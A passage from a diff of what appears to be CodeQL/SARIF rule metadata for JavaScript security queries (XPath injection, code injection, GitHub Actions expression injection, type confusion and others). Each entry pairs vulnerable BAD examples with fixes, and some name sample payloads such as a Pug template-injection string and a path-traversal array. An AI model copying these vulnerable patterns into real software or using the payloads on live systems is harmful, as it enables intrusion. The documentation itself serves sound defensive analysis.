This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116", "external/cwe/cwe-601" ], + "description" : "Client-side URL redirection based on unvalidated user input\n may cause redirection to malicious web sites.", + "id" : "js/client-side-unvalidated-url-redirection", + "kind" : "path-problem", + "name" : "Client-side URL redirect", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/xpath-injection", + "name" : "js/xpath-injection", + "shortDescription" : { + "text" : "XPath injection" + }, + "fullDescription" : { + "text" : "Building an XPath expression from user-controlled sources is vulnerable to insertion of malicious code by the user." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // BAD: Use user-provided data directly in an XPath expression\n let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n badXPathExpr.select({\n node: root\n });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // GOOD: Embed user-provided data using variables\n let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n goodXPathExpr.select({\n node: root,\n variables: { userName: userName }\n });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath 
Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: [xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n", + "markdown" : "# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. 
This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // BAD: Use user-provided data directly in an XPath expression\n let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n badXPathExpr.select({\n node: root\n });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // GOOD: Embed user-provided data using variables\n let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n goodXPathExpr.select({\n node: root,\n variables: { userName: userName }\n });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: [xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-643" ], + "description" : "Building an XPath expression from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", + "id" : "js/xpath-injection", + "kind" : "path-problem", + "name" : "XPath injection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.8" + } + }, { + "id" : 
"js/case-sensitive-middleware-path", + "name" : "js/case-sensitive-middleware-path", + "shortDescription" : { + "text" : "Case-sensitive middleware path" + }, + "fullDescription" : { + "text" : "Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. 
However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n", + "markdown" : "# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. 
However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-178" ], + "description" : "Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths.", + "id" : "js/case-sensitive-middleware-path", + "kind" : "problem", + "name" : "Case-sensitive middleware path", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.3" + } + }, { + "id" : "js/code-injection", + "name" : "js/code-injection", + "shortDescription" : { + "text" : "Code injection" + }, + "fullDescription" : { + "text" : "Interpreting unsanitized user input as code allows a malicious user arbitrary code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. 
Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello `+ input\n var fn = pug.compile(template);\n var html = fn();\n res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. 
The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello #{username}`\n var fn = pug.compile(template);\n var html = fn({username: input});\n res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. 
It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello `+ input\n var fn = pug.compile(template);\n var html = fn();\n res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. 
The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello #{username}`\n var fn = pug.compile(template);\n var html = fn({username: input});\n res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-095", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Interpreting unsanitized user input as code allows a malicious user arbitrary\n code execution.", + "id" : "js/code-injection", + "kind" : "path-problem", + "name" : "Code injection", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.3" + } + }, { + "id" : "js/unsafe-dynamic-method-access", + "name" : "js/unsafe-dynamic-method-access", + "shortDescription" : { + "text" : "Unsafe dynamic method access" + }, + "fullDescription" : { + "text" : "Invoking user-controlled 
methods on certain objects can lead to remote code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n // ...\n}\nfunction pause(data) {\n // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function \n window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. 
It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n play: function(data) {\n // ...\n },\n pause: function(data) {\n // ...\n }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function\n if (!api.hasOwnProperty(message.name)) {\n return;\n }\n api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", + "markdown" : "# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. 
A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n // ...\n}\nfunction pause(data) {\n // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function \n window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n play: function(data) {\n // ...\n },\n pause: function(data) {\n // ...\n }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function\n if (!api.hasOwnProperty(message.name)) {\n return;\n }\n api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-094" ], + "description" : "Invoking user-controlled methods on certain objects can lead to remote code execution.", + "id" : "js/unsafe-dynamic-method-access", + "kind" : "path-problem", + "name" : "Unsafe dynamic method access", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.3" + } + }, { + "id" : "js/actions/command-injection", + "name" : "js/actions/command-injection", + "shortDescription" : { + "text" : "Expression injection in Actions" 
+ }, + "fullDescription" : { + "text" : "Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious user to inject code into the GitHub action." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Expression injection in Actions\nUsing user-controlled input in GitHub Actions may lead to code injection in contexts like *run:* or *script:*.\n\nCode injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository.\n\n\n## Recommendation\nThe best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not *${{ env.VAR }}*).\n\nIt is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN.\n\n\n## Example\nThe following example lets a user inject an arbitrary shell command:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - run: |\n echo '${{ github.event.comment.body }}'\n```\nThe following example uses an environment variable, but **still allows the injection** because of the use of expression syntax:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo '${{ env.BODY }}'\n```\nThe following example uses shell syntax to read the environment variable and will prevent the attack:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo \"$BODY\"\n\n```\n\n## References\n* GitHub Security Lab 
Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input).\n* GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions).\n* GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", + "markdown" : "# Expression injection in Actions\nUsing user-controlled input in GitHub Actions may lead to code injection in contexts like *run:* or *script:*.\n\nCode injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository.\n\n\n## Recommendation\nThe best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not *${{ env.VAR }}*).\n\nIt is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN.\n\n\n## Example\nThe following example lets a user inject an arbitrary shell command:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - run: |\n echo '${{ github.event.comment.body }}'\n```\nThe following example uses an environment variable, but **still allows the injection** because of the use of expression syntax:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo '${{ env.BODY }}'\n```\nThe following 
example uses shell syntax to read the environment variable and will prevent the attack:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo \"$BODY\"\n\n```\n\n## References\n* GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input).\n* GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions).\n* GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" + }, + "properties" : { + "tags" : [ "actions", "security", "external/cwe/cwe-094" ], + "description" : "Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious\n user to inject code into the GitHub action.", + "id" : "js/actions/command-injection", + "kind" : "problem", + "name" : "Expression injection in Actions", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "9.3" + } + }, { + "id" : "js/bad-code-sanitization", + "name" : "js/bad-code-sanitization", + "shortDescription" : { + "text" : "Improper code sanitization" + }, + "fullDescription" : { + "text" : "Escaping code as HTML does not provide protection against code injection." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Improper code sanitization\nUsing string concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains ``, then the generated code will break out of a `` if inserted into a `` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n const assignment = `obj[${JSON.stringify(key)}]=42`;\n return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n '<': '\\\\u003C',\n '>' : '\\\\u003E',\n '/': '\\\\u002F',\n '\\\\': '\\\\\\\\',\n '\\b': '\\\\b',\n '\\f': '\\\\f',\n '\\n': '\\\\n',\n '\\r': '\\\\r',\n '\\t': '\\\\t',\n '\\0': '\\\\0',\n '\\u2028': '\\\\u2028',\n '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Improper code sanitization\nUsing string 
concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains ``, then the generated code will break out of a `` if inserted into a `` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n const assignment = `obj[${JSON.stringify(key)}]=42`;\n return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n '<': '\\\\u003C',\n '>' : '\\\\u003E',\n '/': '\\\\u002F',\n '\\\\': '\\\\\\\\',\n '\\b': '\\\\b',\n '\\f': '\\\\f',\n '\\n': '\\\\n',\n '\\r': '\\\\r',\n '\\t': '\\\\t',\n '\\0': '\\\\0',\n '\\u2028': '\\\\u2028',\n '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Escaping code as HTML does not provide protection against code injection.", 
+ "id" : "js/bad-code-sanitization", + "kind" : "path-problem", + "name" : "Improper code sanitization", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/type-confusion-through-parameter-tampering", + "name" : "js/type-confusion-through-parameter-tampering", + "shortDescription" : { + "text" : "Type confusion through parameter tampering" + }, + "fullDescription" : { + "text" : "Sanitizing an HTTP request parameter may be ineffective if the user controls its type." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. 
But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (file.indexOf(\"..\") !== -1) {\n // BAD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. 
This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n // GOOD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n", + "markdown" : "# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. 
